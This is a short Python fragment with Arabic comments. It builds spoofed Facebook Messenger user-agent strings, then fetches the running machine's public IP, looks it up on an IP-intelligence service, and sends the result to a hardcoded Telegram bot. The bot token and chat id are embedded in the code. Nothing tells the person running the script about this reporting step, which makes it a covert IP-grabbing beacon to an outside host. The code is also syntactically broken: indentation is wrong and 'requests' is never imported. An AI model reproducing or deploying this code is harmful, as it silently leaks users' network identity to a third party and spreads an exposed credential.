from time import sleep  # أضف هذه الخطوة إذا كنت تريد استخدام  sleep

   def m1():
       user_agents = [
           "[FBAN/Orca-Android;FBAV/211.65.5.12;FBPN/com.facebook.orca;FBLC/en_US;FBBV/358680708;FBCR/Orange;FBMF/samsung;FBBD/samsung;FBDV/OnePlus 9 Pro;FBSV/12;FBCA/arm64-v8a:armeabi-v7a:armeabi;FBDM/{density=3.5,width=2560,height=1920};FB_FW/1;FBRV/872310439]",
           "[FBAN/Orca-Android;FBAV/211.65.5.12;FBPN/com.facebook.orca;FBLC/en_US;FBBV/358680708;FBCR/Orange;FBMF/samsung;FBBD/samsung;FBDV/OnePlus 9 Pro;FBSV/12;FBCA/arm64-v8a:armeabi-v7a:armeabi;FBDM/{density=3.5,width=2560,height=1920};FB_FW/1;FBRV/872310439]"
       ]
       return ";".join(user_agents)

   id = "5210419138"
   token = "7244277412:AAFUXBZ1SjvF-z0hUGrJW3tS5jd8ropROVI"

   ipp = requests.get("https://api.ipify.org").text
   ip = requests.get("https://api.incolumitas.com/?q=" + ipp).text

   # sleep(3.0)  # يمكنك إزالة هذه الخطوة إذا لم تكن بحاجة إلى تأخير
   requests.get(f"https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=" + ip)
